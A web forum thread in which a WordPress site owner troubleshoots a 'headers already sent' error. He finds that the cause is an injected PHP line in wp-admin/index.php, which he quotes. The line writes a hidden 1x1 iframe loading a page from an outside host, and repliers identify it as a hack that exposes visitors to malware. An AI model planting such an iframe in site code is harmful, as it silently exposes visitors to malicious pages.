Hi, I was able to enter my WP admin area fine 2 days ago. Today, when entering www.fingervibrator.org/wp-admin in Firefox, I got this strange error preventing me from entering Wordpress: Warning: Cannot modify header information - headers already sent by (output started at /home/gmr324ad/public_html/fingervibrator.org/wp-admin/index.php:3) in /home/gmr324ad/public_html/fingervibrator.org/wp-includes/pluggable.php on line 890 I Googled this and found out it could be related to whitespace, but didn't see any in that index.php file. Any advice would be appreciated George
I installed the usual plugins that I've installed many times before like allinoneseo, easy-privacy-policy, bacupwordpress, ultimate-noindex-nofollow. Nothing out of th ordinary
Anything changed on the server? E.g. fcgid installed or something? 888 if ( php_sapi_name() != 'cgi-fcgi' ) 889 status_header($status); // This causes problems on IIS and some FastCGI setups 890 header("Location: $location", true, $status); Code (markup): pluggable.php
Nothing I'm aware of changed on the server. However, I was just informed of a IFrame line that was in the index.php file which I'm not sure how it got there: echo "<iframe width=\"1\" height=\"1\" src=\"http://hegeam.com/gizmod/start.php?id=vlnd\"></iframe>"; After commenting out that line, I'm able to get into the WP panel. However, just had an issue with the diskrepair virus yesterday on my laptop. On this particular site, I haven't even installed a WP theme yet and am using the default one. I have no idea how that IFrame would have gotten in there. Commenting out that IFrame line did fix the problem. I'm just concerned about my site somehow being hacked and wouldn't even know how to check for that. As a matter of fact, trying to login to my wp-admin panel, there appears to be some sort of redirection like this: http://fingervibrator.org/wp-login.p...in/&reauth=1 Is that normal? Thanks George
Fairly common, you got haxored. Delete that line of code it certainly does not belong there. It essentially redirects folks to a malware infested URL. You may want to check your other sites if you something else on the same machine. Nigel
Which WP version is it? Do you have the Antivirus plugin installed? Or WP File Monitor? Or Secure WordPress plugin?
nope that's not normal, your site has most likely been hacked, you should do a thorough check on your site to see if any more suspicious code has been injected into it, e.g. in the footer.php, and I think you should change your admin panel password.